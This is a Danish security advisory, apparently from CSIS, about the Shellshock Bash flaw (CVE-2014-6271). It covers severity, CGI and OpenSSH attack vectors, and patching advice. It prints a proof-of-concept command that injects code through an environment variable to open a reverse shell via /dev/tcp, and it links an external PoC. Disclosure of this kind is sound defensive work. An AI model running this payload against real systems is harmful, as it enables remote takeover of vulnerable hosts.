Der er fundet en ekstremt alvorlig fejl i måden hvorpå Bash under UNIX/Linux evaluerer særligt udformede variabler. En angriber kan fra et eksternt ståsted misbruge dette til at omgå restriktioner og afvikle shell kommandoer på et sårbart system. Et større antal services og applikationer samt Debian og andre Linux distributioner, er sårbare overfor eksterne angreb og er i risiko for komplet systemkompromittering.
Hvad er bash?
Bash er sandsynligvis det mest anvendte værktøj under Linux. Det blev skabt i 1980 og har hen over tid udvilket sig fra at være en simpel terminal baseret kommando fortolker til at have massevis af funktionalitet og anvendelsesmuligheder (http://en.wikipedia.org/wiki/Bash_%28Unix_shell%29).
Sårbarheden har en grad af alvor, som kaster den ud i næsten samme kategori som Heartbleed. Den har fået tildelt CVE-ID: CVE-2014-6271 ("remote code execution through bash") og optræder i svært mange services og applikationer. Den er tilmed triviel at misbruge. Der er allerede Proof of Concept (PoC) kode i omløb, hvilket bringer denne sårbarhed i klassen "svært kritisk".
Proof of Concept
Et eksempel, som kan anvendes til at teste sårbarhedens eksistens via cgi-bin (vil spawne en shell lyttende på TCP port 55555), findes herunder:
$ env test='() { ignored;};/bin/bash -i >& /dev/tcp/127.0.0.1/55555
0>&1' bash -c "pwd"
De oplagte angrebsvektorer skønnes at være over HTTP og via forskellige CGI funktioner samt særlige implementeringer af OpenSSH.
Der arbejdes fra flere sider på at integrere et modul til Metasploit. Det kan ej heller udelukkes at denne svaghed også vil blive misbrugt i selv-replikerende kode. Det forlyder, at den officielle titel på denne sårbarhed kan blive "shellshock".
Anbefalinger
CSIS anbefaler, at man patcher med det samme, eller som minimum tager skridt til at migrere denne svaghed. Det kan bl.a. ske ved erstatte bash med en anden/alternativ shell, begrænse adgang til sårbare services, eller filtre input til sårbare services.
Udover et større antal populære operativ systemer og software pakker, så findes denne sårbarhed også i flere embedded devices samt trådløse routere.
Svagheden er fundet af Stephane Chazelas.
Yderligere oplysninger:
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
http://pastebin.com/166f8Rjx (PoC)
↧
CSIS Nyheder: Super kritisk *NIX bash hul
↧
